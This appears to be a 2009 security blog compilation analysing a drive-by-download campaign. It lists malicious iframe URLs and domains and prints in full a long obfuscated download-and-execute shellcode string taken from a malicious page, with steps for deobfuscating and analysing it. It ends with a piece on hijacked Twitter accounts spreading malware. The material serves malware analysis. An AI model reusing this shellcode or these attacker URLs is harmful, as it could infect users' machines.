Denis Sinegubko, an independent researcher based in Magnitogorsk, Russia, has discovered infected web hosting servers that run legitimate websites but have been hacked to also run a nginx which serves malware.

The malware is installed via iframe redirection example below

i_frame src=”http ://a86x . homeunix . org:8080/ts/in.cgi?open2

He goes on to describe the evolution of the campaign from his perspective starting this spring.

“They started with gambling-related .cn domains (like cheapslotplay .cn). They introduced several new domains names every day so that you couldn’t hardcode them in your scanners. At this point, my records contain several hundred domains used in this attack. They also changed campaign names (parameters they specify in iframe URLs) regularly: mozila, banner, cocacola, pepsi, open, reopen, income. They used port 8080 (presumably to game dumb traffic filters that only inspect traffic on port 80). In the end of July, they started to use 3-letter .ru, .pl, .in and .at domains (e.g. x3y .ru, f7y .at, q5n .in, a3j .pl).”

I have also been watching this campaign dubbed the “pepsi campaign” for the use of the word “in.cgi?pepsi18″ within the GET requests generated by the series of redirects which ultimately leads to the installation of malware. The article can be found here.

Listed below are the latest ones from today.

20090914 _a5i.at:8080/welcome.php?id=0
20090914 _digifero.com:8080
20090914 _f8a.ru:8080/welcome.php?id=0
20090914 _gianttoplocate.cn:8080/landig.php?id=4
20090914 _gianttoplocate.cn:8080/load.php?id=0

Exploit Tool kit’s out in the wild often utilize Download and execute shell-code which when run on the end system downloads and executes a file to allow the attacker to control the system. This is commonly used in Drive By Download attacks where a victim visits a malicious web page that in turn attempts to execute the shell-code in order to install software on the victim’s machine.

More often then not the shell-code is buried within obfuscated javascript. Searching the Murls database reveals one such URL (hxxp://rrrxgvdf.6600.org/kuaile/19.htm).

The above image visualizes the series of redirects that occur via Iframe tags after the victim browses to (hxxp://rrrxgvdf.6600.org/kuaile/19.htm). The example below was found at the following URL. (wm.yxnjs.com_x148_of.js) This shows a simple form of obfuscation where they substitute “%u” for “MTV”

Example of Obfuscated Shellcode
var MTV=”%u”;<br /> var YT=unescape;<br /> var s=YT(MTV+”E8″+”90″+MTV+”034D”+MTV+”0000″+MTV+”0068″+MTV+”0020″+MTV+”6A00″+MTV+”FF00″+MTV+”B9D0″+MTV+”0800″+MTV+”0000″+MTV+”F88B”+MTV+”05EB”+MTV+”F35E”+MTV+”FFA4″+MTV+”E8D0″+MTV+”FFF6″+MTV+”FFFF”+MTV+”54E8″);</p> <p>s+=YT(MTV+”0003″+MTV+”8B00″+MTV+”E8F8″+MTV+”0038″+MTV+”0000″+MTV+”64E8″+MTV+”0001″+MTV+”E800″+MTV+”0046″+MTV+”0000″+MTV+”F2E8″+MTV+”0003″+MTV+”8B00″+MTV+”E8F8″+MTV+”0022″+MTV+”0000″+MTV+”5BE8″+MTV+”0001″+MTV+”E800″);<br /> s+=YT(MTV+”0030″+MTV+”0000″+MTV+”A0E8″+MTV+”0003″+MTV+”8B00″+MTV+”E8F8″+MTV+”000C”+MTV+”0000″+MTV+”78E8″+MTV+”0001″+MTV+”E800″+MTV+”001A”+MTV+”0000″+MTV+”58EB”+MTV+”8B53″+MTV+”53DC”+MTV+”406A”+MTV+”0068″+MTV+”0010″);<br /> s+=YT(MTV+”5700″+MTV+”C8E8″+MTV+”0002″+MTV+”E800″+MTV+”00FA”+MTV+”0000″+MTV+”C358″+MTV+”8B53″+MTV+”53DC”+MTV+”206A”+MTV+”0068″+MTV+”0010″+MTV+”5700″+MTV+”B0E8″+MTV+”0002″+MTV+”E800″+MTV+”00E2″+MTV+”0000″+MTV+”C358″);</p> <p>s+=YT(MTV+”E857″+MTV+”0453″+MTV+”0000″+MTV+”F88B”+MTV+”C933″+MTV+”3349″+MTV+”B0C0″+MTV+”FCC3″+MTV+”AEF2″+MTV+”478D”+MTV+”5FFF”+MTV+”5BC3″+MTV+”C63E”+MTV+”B807″+MTV+”893E”+MTV+”015F”+MTV+”3E66″+MTV+”47C7″+MTV+”FF05″);</p> <p>s+=YT(MTV+”C3E0″+MTV+”ACE9″+MTV+”0004″+MTV+”5B00″+MTV+”EC81″+MTV+”0114″+MTV+”0000″+MTV+”D48B”+MTV+”C73E”+MTV+”6302″+MTV+”646D”+MTV+”3E20″+MTV+”42C7″+MTV+”2F04″+MTV+”2063″+MTV+”3E22″);</p> <p>s+=YT(MTV+”42C7″+MTV+”6308″+MTV+”646D”+MTV+”3E20″+MTV+”42C7″+MTV+”2F0C”+MTV+”2063″+MTV+”8322″+MTV+”10C2″+MTV+”C033″+MTV+”5050″+MTV+”0468″+MTV+”0001″+MTV+”5200″+MTV+”5053″+MTV+”C8E8″+MTV+”0003″);<br /> s+=YT(MTV+”E800″+MTV+”0072″+MTV+”0000″+MTV+”FC8B”+MTV+”C78B”+MTV+”C083″+MTV+”3E08″+MTV+”188A”+MTV+”DB84″+MTV+”0374″+MTV+”EB40″+MTV+”66F6″+MTV+”C73E”+MTV+”2200″+MTV+”3322″+MTV+”3ED2″+MTV+”5088″);</p> <p>s+=YT(MTV+”8302″+MTV+”54EC”+MTV+”C033″+MTV+”DB33″+MTV+”CC8B”+MTV+”F883″+MTV+”7D54″+MTV+”3E09″+MTV+”1C89″+MTV+”8308″+MTV+”04C0″+MTV+”F2EB”+MTV+”CC8B”+MTV+”D98B”+MTV+”C383″+MTV+”3310″+MTV+”3EC0″);</p> <p>s+=YT(MTV+”43C7″+MTV+”012C”+MTV+”0000″+MTV+”5100″+MTV+”5053″+MTV+”5050″+MTV+”5050″+MTV+”5750″+MTV+”E850″+MTV+”033B”+MTV+”0000″+MTV+”19E8″+MTV+”0000″+MTV+”6400″+MTV+”04A1″+MTV+”0000″+MTV+”8D00″);</p> <p>s+=YT(MTV+”60A0″+MTV+”FFFF”+MTV+”E8FF”+MTV+”0339″+MTV+”0000″+MTV+”DB33″+MTV+”5353″+MTV+”5353″+MTV+”D0FF”+MTV+”3880″+MTV+”74E9″+MTV+”8005″+MTV+”E838″+MTV+”0F75″+MTV+”7881″+MTV+”9005″+MTV+”4190″);<br /> s+=YT(MTV+”7490″+MTV+”5506″+MTV+”EC8B”+MTV+”408D”+MTV+”FF05″+MTV+”E8E0″+MTV+”FF17″+MTV+”FFFF”+MTV+”E8C3″+MTV+”FF11″+MTV+”FFFF”+MTV+”11B8″+MTV+”0401″+MTV+”C280″+MTV+”000C”+MTV+”04E8″+MTV+”FFFF”);<br /> s+=YT(MTV+”33FF”+MTV+”50C0″+MTV+”E854″+MTV+”0054″+MTV+”0000″+MTV+”E850″+MTV+”028B”+MTV+”0000″+MTV+”D0FF”+MTV+”8036″+MTV+”243C”+MTV+”7700″+MTV+”E80A”+MTV+”0241″+MTV+”0000″+MTV+”FF33″+MTV+”FF57″);<br /> s+=YT(MTV+”E8D0″+MTV+”01FB”+MTV+”0000″+MTV+”FF68″+MTV+”0000″+MTV+”FF00″+MTV+”E8D0″+MTV+”FED1″+MTV+”FFFF”+MTV+”5753″+MTV+”3356″+MTV+”50C0″+MTV+”E854″+MTV+”001E”+MTV+”0000″+MTV+”E850″+MTV+”0255″);</p> <p>s+=YT(MTV+”0000″+MTV+”D0FF”+MTV+”8036″+MTV+”243C”+MTV+”7700″+MTV+”E80A”+MTV+”020B”+MTV+”0000″+MTV+”FF33″+MTV+”FF57″+MTV+”58D0″+MTV+”5F5E”+MTV+”C35B”+MTV+”02EB”+MTV+”C358″+MTV+”F9E8″+MTV+”FFFF”);<br /> s+=YT(MTV+”56FF”+MTV+”8357″+MTV+”08EC”+MTV+”FC8B”+MTV+”086A”+MTV+”3E57″+MTV+”77FF”+MTV+”E814″+MTV+”025D”+MTV+”0000″+MTV+”D0FF”+MTV+”FC8B”+MTV+”6168″+MTV+”656D”+MTV+”6800″+MTV+”4549″+MTV+”7246″);</p> <p>s+=YT(MTV+”F48B”+MTV+”08B9″+MTV+”0000″+MTV+”F300″+MTV+”75A6″+MTV+”6A2F”+MTV+”3E00″+MTV+”74FF”+MTV+”2024″+MTV+”24E8″+MTV+”0002″+MTV+”FF00″+MTV+”8BD0″+MTV+”E8F8″+MTV+”01CB”+MTV+”0000″+MTV+”D0FF”);<br /> s+=YT(MTV+”F83B”+MTV+”0874″+MTV+”8B36″+MTV+”2444″+MTV+”3E20″+MTV+”00FF”+MTV+”FF3E”+MTV+”2474″+MTV+”E81C”+MTV+”01EF”+MTV+”0000″+MTV+”D0FF”+MTV+”C483″+MTV+”5F10″+MTV+”B85E”+MTV+”0001″+MTV+”0000″);<br /> s+=YT(MTV+”68C3″+MTV+”6E6F”+MTV+”0000″+MTV+”7568″+MTV+”6C72″+MTV+”EB6D”+MTV+”8D15″+MTV+”2444″+MTV+”5004″+MTV+”0BE8″+MTV+”FFFE”+MTV+”50FF”+MTV+”4AE8″+MTV+”0002″+MTV+”E900″+MTV+”FEE0″+MTV+”FFFF”);</p> <p>s+=YT(MTV+”E6E8″+MTV+”FFFF”+MTV+”83FF”+MTV+”08C4″+MTV+”6AC3″+MTV+”686C”+MTV+”746E”+MTV+”6C64″+MTV+”15EB”+MTV+”448D”+MTV+”0424″+MTV+”E850″+MTV+”FDE4″+MTV+”FFFF”+MTV+”E850″+MTV+”0223″+MTV+”0000″);<br /> s+=YT(MTV+”B9E9″+MTV+”FFFE”+MTV+”E8FF”+MTV+”FFE6″+MTV+”FFFF”+MTV+”C483″+MTV+”C308″+MTV+”3368″+MTV+”0032″+MTV+”6800″+MTV+”7375″+MTV+”7265″+MTV+”15EB”+MTV+”448D”+MTV+”0424″+MTV+”E850″+MTV+”FDBA”);<br /> s+=YT(MTV+”FFFF”+MTV+”E850″+MTV+”01F9″+MTV+”0000″+MTV+”8FE9″+MTV+”FFFE”+MTV+”E8FF”+MTV+”FFE6″+MTV+”FFFF”+MTV+”C483″+MTV+”C308″+MTV+”6368″+MTV+”7776″+MTV+”6800″+MTV+”6873″+MTV+”6F64″+MTV+”15EB”);<br /> s+=YT(MTV+”448D”+MTV+”0424″+MTV+”E850″+MTV+”FD90″+MTV+”FFFF”+MTV+”E850″+MTV+”01CF”+MTV+”0000″+MTV+”65E9″+MTV+”FFFE”+MTV+”E8FF”+MTV+”FFE6″+MTV+”FFFF”+MTV+”C483″+MTV+”C308″+MTV+”7668″+MTV+”7867″);</p> <p>s+=YT(MTV+”EB00″+MTV+”8D15″+MTV+”2444″+MTV+”5004″+MTV+”6BE8″+MTV+”FFFD”+MTV+”50FF”+MTV+”AAE8″+MTV+”0001″+MTV+”E900″+MTV+”FE40″+MTV+”FFFF”+MTV+”E6E8″+MTV+”FFFF”+MTV+”83FF”+MTV+”04C4″+MTV+”E8C3″);</p> <p>s+=YT(MTV+”01AB”+MTV+”0000″+MTV+”1B68″+MTV+”46C6″+MTV+”5079″+MTV+”C6E8″+MTV+”0001″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”0197″+MTV+”0000″+MTV+”EC68″+MTV+”0397″+MTV+”500C”+MTV+”B2E8″+MTV+”0001″);</p> <p>s+=YT(MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”0183″+MTV+”0000″+MTV+”AA68″+MTV+”0DFC”+MTV+”507C”+MTV+”9EE8″+MTV+”0001″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”016F”+MTV+”0000″+MTV+”ED68″+MTV+”EF56″);</p> <p>s+=YT(MTV+”5036″+MTV+”8AE8″+MTV+”0001″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”015B”+MTV+”0000″+MTV+”F068″+MTV+”048A”+MTV+”505F”+MTV+”76E8″+MTV+”0001″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”FEF7″);<br /> s+=YT(MTV+”FFFF”+MTV+”7868″+MTV+”DB68″+MTV+”501C”+MTV+”62E8″+MTV+”0001″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”0133″+MTV+”0000″+MTV+”EF68″+MTV+”E0CE”+MTV+”5060″+MTV+”4EE8″+MTV+”0001″+MTV+”8300″);</p> <p>s+=YT(MTV+”08C4″+MTV+”E8C3″+MTV+”011F”+MTV+”0000″+MTV+”B068″+MTV+”2D49″+MTV+”50DB”+MTV+”3AE8″+MTV+”0001″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”FF36″+MTV+”FFFF”+MTV+”AB68″+MTV+”9B5E”+MTV+”501E”);</p> <p>s+=YT(MTV+”26E8″+MTV+”0001″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”FEA7″+MTV+”FFFF”+MTV+”5968″+MTV+”8197″+MTV+”5002″+MTV+”12E8″+MTV+”0001″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”00E3″+MTV+”0000″);</p> <p>s+=YT(MTV+”7E68″+MTV+”E2D8″+MTV+”5073″+MTV+”FEE8″+MTV+”0000″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”00CF”+MTV+”0000″+MTV+”9E68″+MTV+”BBF9″+MTV+”5035″+MTV+”EAE8″+MTV+”0000″+MTV+”8300″+MTV+”08C4″);<br /> s+=YT(MTV+”E8C3″+MTV+”FE92″+MTV+”FFFF”+MTV+”5768″+MTV+”B5A0″+MTV+”50BB”+MTV+”D6E8″+MTV+”0000″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”FE7E”+MTV+”FFFF”+MTV+”1A68″+MTV+”1E7A”+MTV+”5002″+MTV+”C2E8″+MTV+”0000″);</p> <p>s+=YT(MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”FE6A”+MTV+”FFFF”+MTV+”E068″+MTV+”305B”+MTV+”5094″+MTV+”AEE8″+MTV+”0000″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”FE56″+MTV+”FFFF”+MTV+”9768″+MTV+”E2C9″);</p> <p>s+=YT(MTV+”50A3″+MTV+”9AE8″+MTV+”0000″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”FE42″+MTV+”FFFF”+MTV+”6868″+MTV+”C524″+MTV+”50B3″+MTV+”86E8″+MTV+”0000″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”0057″);<br /> s+=YT(MTV+”0000″+MTV+”7268″+MTV+”B3FE”+MTV+”5016″+MTV+”72E8″+MTV+”0000″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”FE44″+MTV+”FFFF”+MTV+”13EB”+MTV+”656A”+MTV+”E850″+MTV+”FBE0″+MTV+”FFFF”+MTV+”E850″);<br /> s+=YT(MTV+”FEAB”+MTV+”FFFF”+MTV+”B5E9″+MTV+”FFFC”+MTV+”E8FF”+MTV+”FFE8″+MTV+”FFFF”+MTV+”E8C3″+MTV+”FDA9″+MTV+”FFFF”+MTV+”4F68″+MTV+”4FEF”+MTV+”5005″+MTV+”3EE8″+MTV+”0000″+MTV+”8300″+MTV+”08C4″);<br /> s+=YT(MTV+”E8C3″+MTV+”000F”+MTV+”0000″+MTV+”8E68″+MTV+”0E4E”+MTV+”50EC”+MTV+”2AE8″+MTV+”0000″+MTV+”8300″+MTV+”08C4″+MTV+”33C3″+MTV+”64C0″+MTV+”408B”+MTV+”8530″+MTV+”78C0″+MTV+”3E10″+MTV+”408B”);<br /> s+=YT(MTV+”3E0C”+MTV+”708B”+MTV+”AD1C”+MTV+”8B3E”+MTV+”0840″+MTV+”EBC3″+MTV+”3E0B”+MTV+”408B”+MTV+”8334″+MTV+”7CC0″+MTV+”8B3E”+MTV+”3C40″+MTV+”60C3″+MTV+”8B36″+MTV+”246C”+MTV+”3624″+MTV+”458B”);</p> <p>s+=YT(MTV+”363C”+MTV+”548B”+MTV+”7828″+MTV+”D503″+MTV+”8B3E”+MTV+”184A”+MTV+”8B3E”+MTV+”205A”+MTV+”DD03″+MTV+”3BE3″+MTV+”3E49″+MTV+”348B”+MTV+”038B”+MTV+”33F5″+MTV+”33FF”+MTV+”FCC0″+MTV+”84AC”);</p> <p>s+=YT(MTV+”74C0″+MTV+”C107″+MTV+”0DCF”+MTV+”F803″+MTV+”F4EB”+MTV+”3B36″+MTV+”247C”+MTV+”7528″+MTV+”3EDF”+MTV+”5A8B”+MTV+”0324″+MTV+”66DD”+MTV+”8B3E”+MTV+”4B0C”+MTV+”8B3E”+MTV+”1C5A”+MTV+”DD03″);<br /> s+=YT(MTV+”8B3E”+MTV+”8B04″+MTV+”C503″+MTV+”8936″+MTV+”2444″+MTV+”611C”+MTV+”E8C3″+MTV+”FB4F”+MTV+”FFFF”);</p> <p>var c=s+u;<br />

Exploits that target browsers commonly encode shellcode in a JavaScript string using Percent-encoding, “%uXXXX”-encoding or entity encoding. Some exploits also obfuscate the encoded shellcode string further to prevent detection by IDS. The example above is one such example of obfuscation because they are substituting the characters MTV with %u and in this case utilizing percent encoding.

Thanks to David Zimmer over at Idefense the following tool can be used to investigate shell-code either by static or dynamic analysis. Before we can do that we have to clean up the code by replacing MTV with %u and eliminating everything so that we have a “%uXXXX” format. Once the code is all cleaned up you can submit it here The script will then return you a file named shecode.exe_ (the underscore is so that you dont execute it by accident). After saving to the desktop you can then submit to Virus Total, open in your debugger/disassembler or submit to Anubis for a behavioral analysis.

Virus Total Report
Threatexpert Report

An interesting article on how twitter can be used as a medium to steal your identity, infect your computer or using your twitter password to gain access to other online accounts. Below is a good example on how twitter can be used to infect a large amount of people.

Malware Infection

Twitter officials said 33 accounts had been attacked in the latest hack, including high-profile users such as Britney Spears and Barack Obama. The hackers used their temporary access to send offensive messages. CNN journalist Rick Sanchez found his account had been hacked with a message that read “i am high on crack right now might not be coming to work today.”

The damage could have been much worse, said Cluley, if the hacker had decided to take a different approach.

“Imagine if instead, in the case of Britney Spears account for example, that the hacker had posted a link that said: ‘Here’s my new video. Click on this link.’ Imagine how many people would have clicked on that and it could have pointed to malware? And Barack Obama is one of the most followed people on Twitter. If he said: ‘I’ve just made a new speech. Check it out.’ a lot of people would click on that link and get infected.”

Read About the other 2 ways